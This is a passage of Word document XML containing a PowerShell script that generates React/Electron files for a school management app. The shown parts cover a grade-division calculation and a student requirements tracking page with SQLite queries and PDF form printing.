        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  for (const score of best8) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="96A36838">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if (score &gt;= 80) totalPoints += 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="93EEBF63">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    else if (score &gt;= 75) totalPoints += 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44335100">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    else if (score &gt;= 70) totalPoints += 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16584415">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    else if (score &gt;= 65) totalPoints += 4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428FB7A3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    else if (score &gt;= 60) totalPoints += 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFE5ECF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    else if (score &gt;= 55) totalPoints += 6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A355AEDB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    else if (score &gt;= 50) totalPoints += 7;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F4049D8E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    else if (score &gt;= 45) totalPoints += 8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7265D702">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    else totalPoints += 9;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E9EC31">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FFFA63D3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  let division = 'U';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8FB6C81E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if (totalPoints &lt;= 32) division = 'Div 1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="856BF8AF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  else if (totalPoints &lt;= 45) division = 'Div 2';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F14B4C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  else if (totalPoints &lt;= 58) division = 'Div 3';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CF880A21">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  else if (totalPoints &lt;= 68) division = 'Div 4';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F3E8BEF5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  return totalPoints + ' (' + division + ')';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A85AC15E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AD556183">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>'@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="EC5E3A99">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $unebLogicSafe = $unebLogic.Replace('$', '$$')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E5517A73">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        $c = $c -replace "export default function BroadSheet\(\) \{", "$unebLogicSafe`nexport default function BroadSheet() {"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EA0461">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4873CA9A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Set-Content -Path $bsPath -Value $c -Encoding UTF8 -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5875BF86">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F606F384">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="DFB74EAD">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t># ═══ 11. CREATE/UPDATE REQUIREMENTS.JSX ═══</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="949A35CC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>Write-Host "[11/15] Creating Requirements Page..." -ForegroundColor Yellow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D6C0F6A3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $reqPath = Join-Path $root "src\pages\Requirements.jsx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175805F6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> $reqContent = @'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8C89B957">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>import React, { useState, useEffect } from 'react';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D23852DE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>import { jsPDF } from 'jspdf';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437792F4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="C5A2BA11">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t>export default function Requirements() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A18119">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  var [students, setStudents] = useState([]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC7B19E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  var [requirements, setRequirements] = useState([]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3010EA9F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  var [newReq, setNewReq] = useState({ name: '', section: 'All' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E7A2BE3C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  var [records, setRecords] = useState({});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="971F5C3D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  var [msg, setMsg] = useState('');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CBF4F5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00BF70EA">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  var fetchData = async function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00669026">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CA1632">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      var sRes = await window.electronAPI.queryDatabase("SELECT id, first_name, last_name, admission_number, student_type FROM students WHERE status = 'Active' ORDER BY first_name");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7189C27C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      if (sRes.success) setStudents(sRes.data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386ADAB5">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      var rRes = await window.electronAPI.queryDatabase("SELECT value FROM system_settings WHERE key = 'school_requirements'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A058BBC9">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      if (rRes.success &amp;&amp; rRes.data.length &gt; 0) { setRequirements(JSON.parse(rRes.data[0].value)); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3A90C6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      var recRes = await window.electronAPI.queryDatabase("SELECT student_id, requirement_name, submitted FROM student_requirements");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="ADFBD69F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      if (recRes.success) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8E2912">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        var map = {};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDD9E60">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        recRes.data.forEach(function(r) { if(!map[r.student_id]) map[r.student_id] = {}; map[r.student_id][r.requirement_name] = r.submitted; });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE0FF65">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        setRecords(map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DF438B19">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DA014DBB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    } catch(e) { setMsg('Error: ' + e.message); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E4871B44">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB8B69C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  useEffect(function() { fetchData(); }, []);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="93E23BBC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FACE07B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  var addRequirement = async function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6260CE59">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if(!newReq.name) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DEA98705">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    var updated = [...requirements, newReq];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="AA5BBB4B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    setRequirements(updated);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D2E12498">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await window.electronAPI.queryDatabase("INSERT OR REPLACE INTO system_settings (key, value) VALUES ('school_requirements', ?)", [JSON.stringify(updated)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BF4DF0AC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    setNewReq({name:'', section:'All'}); setMsg('Requirement added!');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32639751">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40614CE3">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="9E35A281">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  var deleteRequirement = async function(name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="EA9808C2">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    var updated = requirements.filter(function(r) { return r.name !== name; });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2147DE67">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    setRequirements(updated);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C2856F6C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await window.electronAPI.queryDatabase("INSERT OR REPLACE INTO system_settings (key, value) VALUES ('school_requirements', ?)", [JSON.stringify(updated)]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="81AF115A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await window.electronAPI.queryDatabase("DELETE FROM student_requirements WHERE requirement_name=?", [name]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F8AD9B37">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    fetchData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E7E8CB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="8730E013">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="C3077CCC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  var updateRecord = async function(studentId, reqName, value) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68325F4E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await window.electronAPI.queryDatabase("INSERT OR REPLACE INTO student_requirements (student_id, requirement_name, submitted) VALUES (?, ?, ?)", [studentId, reqName, value]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534F0B19">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    setRecords(function(prev) { var next = {...prev}; if(!next[studentId]) next[studentId] = {}; next[studentId][reqName] = value; return next; });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DE7F3DA8">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9FB44854">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC12A65">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  var printForm = function() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="95F2724D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    var doc = new jsPDF();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E35153EF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    doc.setFontSize(18); doc.text("School Requirements &amp; Fees Form", 105, 20, { align: 'center' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A15CF945">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    doc.setFontSize(12); doc.text("Date: " + new Date().toLocaleDateString(), 14, 30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C977E67D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    var y = 40; doc.setFontSize(14); doc.text("Requirements Checklist:", 14, y); y += 8; doc.setFontSize(11);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="DEF6C23E">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    requirements.forEach(function(r, i) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="FAE0D7AF">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      if (y &gt; 270) { doc.addPage(); y = 20; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51458F23">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      doc.text(i+1 + ". " + r.name + " (" + r.section + ")", 16, y); doc.rect(150, y-4, 5, 5); y += 8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C257292F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583D8247">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    y += 10; if (y &gt; 250) { doc.addPage(); y = 20; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="B31EFF8F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    doc.setFontSize(14); doc.text("Parent/Guardian Declaration:", 14, y); y += 8; doc.setFontSize(11);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1C4025">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    doc.text("I confirm that the above requirements have been provided:", 14, y); y += 15; doc.text("Signature: ______________________", 14, y);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2C43BE">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    doc.save('School_Requirements_Form.pdf');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ACA8C6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="ECAA4A8A">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68464752">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  return (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D71B2C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;div className="page-container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8CE206">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;h1 className="page-title"&gt;Requirements &amp; Tracking Sheet&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="D99CFDDC">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      {msg &amp;&amp; &lt;p style={{ color: 'green', marginBottom: '15px' }}&gt;{msg}&lt;/p&gt;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="BF1B1B66">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;div className="card" style={{ marginBottom: '20px' }}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220B049D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div className="card-header" style={{ display: 'flex', justifyContent: 'space-between' }}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="9D0E6456">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;span&gt;Set School Requirements&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="A8675A5B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;button onClick={printForm} className="btn btn-secondary" style={{ padding: '5px 12px' }}&gt;Print Blank Form&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441533C6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022D6387">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div className="card-body"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158D5267">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;div style={{ display: 'flex', gap: '10px', marginBottom: '15px' }}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CEE1C7">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;input className="form-input" value={newReq.name} onChange={function(e) { setNewReq({...newReq, name: e.target.value}); }} placeholder="e.g., Medical Form, Books (12)" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="F6A61650">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;select className="form-input" style={{ maxWidth: '200px' }} value={newReq.section} onChange={function(e) { setNewReq({...newReq, section: e.target.value}); }}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="EBAB93C4">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              &lt;option&gt;All&lt;/option&gt;&lt;option&gt;Day&lt;/option&gt;&lt;option&gt;Boarding Boys&lt;/option&gt;&lt;option&gt;Boarding Girls&lt;/option&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="CBB0A341">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;/select&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37101D3D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;button onClick={addRequirement} className="btn btn-primary"&gt;Add&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="92F70EE6">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E64ADD2C">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;div style={{ display: 'flex', flexWrap: 'wrap', gap: '10px' }}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FC620D">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            {requirements.map(function(r, i) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CB8628">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              return (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="E4985DA1">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;div key={i} style={{ display: 'flex', alignItems: 'center', gap: '8px', background: '#e8f0fe', color: '#1a73e8', padding: '5px 15px', borderRadius: '15px', fontSize: '13px', fontWeight: '600' }}&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BCD52F">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                  &lt;span&gt;{r.name} ({r.section})&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6798EB">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                  &lt;button onClick={function() { deleteRequirement(r.name); }} style={{ background: 'none', border: 'none', color: 'red', cursor: 'pointer', fontWeight: 'bold' }}&gt;X&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="C60D6A91">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F421F1B">
      <w:pPr>
        <w:pStyle w:val="style0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">              );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="941A8350">
      <w:pPr>
        <w:pStyle w:val="style0"/>
